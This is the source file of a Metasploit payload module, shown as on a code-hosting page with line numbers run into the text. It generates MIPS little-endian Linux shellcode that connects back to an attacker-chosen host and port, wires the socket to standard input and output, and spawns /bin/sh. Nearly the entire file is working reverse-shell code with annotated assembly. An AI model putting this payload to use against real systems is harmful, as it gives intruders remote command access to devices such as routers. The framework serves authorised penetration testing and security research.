Path: blob/master/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 18478include Msf::Payload::Single9include Msf::Sessions::CommandShellOptions1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Linux Command Shell, Reverse TCP Inline',16'Description' => 'Connect back to attacker and spawn a command shell',17'Author' => [18'rigan <imrigan[at]gmail.com>', # Original (mipsbe) shellcode19'juan vazquez' # Metasploit module20],21'License' => MSF_LICENSE,22'Platform' => 'linux',23'Arch' => ARCH_MIPSLE,24'Handler' => Msf::Handler::ReverseTcp,25'Session' => Msf::Sessions::CommandShellUnix,26'Payload' => {27'Offsets' => {},28'Payload' => ''29}30)31)32end3334def generate(_opts = {})35if !datastore['LHOST'] || datastore['LHOST'].empty?36return super37end3839host = Rex::Socket.addr_atoi(datastore['LHOST'])40port = Integer(datastore['LPORT'])4142host = [host].pack('N').unpack('cccc')43port = [port].pack('n').unpack('cc')4445shellcode =46# sys_socket47# a0: domain48# a1: type49# a2: protocol50"\xfa\xff\x0f\x24" + # li t7,-651"\x27\x78\xe0\x01" + # nor t7,t7,zero52"\xfd\xff\xe4\x21" + # addi a0,t7,-353"\xfd\xff\xe5\x21" + # addi a1,t7,-354"\xff\xff\x06\x28" + # slti a2,zero,-155"\x57\x10\x02\x24" + # li v0,4183 # sys_socket56"\x0c\x01\x01\x01" + # syscall 0x404045758# sys_connect59# a0: sockfd (stored on the stack)60# a1: addr (data stored on the stack)61# a2: addrlen62"\xff\xff\xa2\xaf" + # sw v0,-1(sp)63"\xff\xff\xa4\x8f" + # lw a0,-1(sp)64"\xfd\xff\x0f\x34" + # li t7,0xfffd65"\x27\x78\xe0\x01" + # nor t7,t7,zero66"\xe2\xff\xaf\xaf" + # sw t7,-30(sp)67port.pack('C2') + "\x0e\x3c" + # lui t6,0x1f9068port.pack('C2') + "\xce\x35" + # ori t6,t6,0x1f9069"\xe4\xff\xae\xaf" + # sw t6,-28(sp)70host[2..3].pack('C2') + "\x0e\x3c" + # lui t6,0x7f0171host[0..1].pack('C2') + "\xce\x35" + # ori t6,t6,0x10172"\xe6\xff\xae\xaf" + # sw t6,-26(sp)73"\xe2\xff\xa5\x27" + # addiu a1,sp,-3074"\xef\xff\x0c\x24" + # li t4,-1775"\x27\x30\x80\x01" + # nor a2,t4,zero76"\x4a\x10\x02\x24" + # li v0,4170 # sys_connect77"\x0c\x01\x01\x01" + # syscall 0x404047879# sys_dup280# a0: oldfd (socket)81# a1: newfd (0, 1, 2)82"\xfd\xff\x11\x24" + # li s1,-383"\x27\x88\x20\x02" + # nor s1,s1,zero84"\xff\xff\xa4\x8f" + # lw a0,-1(sp)85"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop86"\xdf\x0f\x02\x24" + # li v0,4063 # sys_dup287"\x0c\x01\x01\x01" + # syscall 0x4040488"\xff\xff\x10\x24" + # li s0,-189"\xff\xff\x31\x22" + # addi s1,s1,-190"\xfa\xff\x30\x16" + # bne s1,s0,68 <dup2_loop>9192# sys_execve93# a0: filename (stored on the stack) "//bin/sh"94# a1: argv "//bin/sh"95# a2: envp (null)96"\xff\xff\x06\x28" + # slti a2,zero,-197"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"98"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"99"\xec\xff\xaf\xaf" + # sw t7,-20(sp)100"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"101"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"102"\xf0\xff\xae\xaf" + # sw t6,-16(sp)103"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)104"\xec\xff\xa4\x27" + # addiu a0,sp,-20105"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)106"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)107"\xf8\xff\xa5\x27" + # addiu a1,sp,-8108"\xab\x0f\x02\x24" + # li v0,4011 # sys_execve109"\x0c\x01\x01\x01" # syscall 0x40404110111return super + shellcode112end113end114115116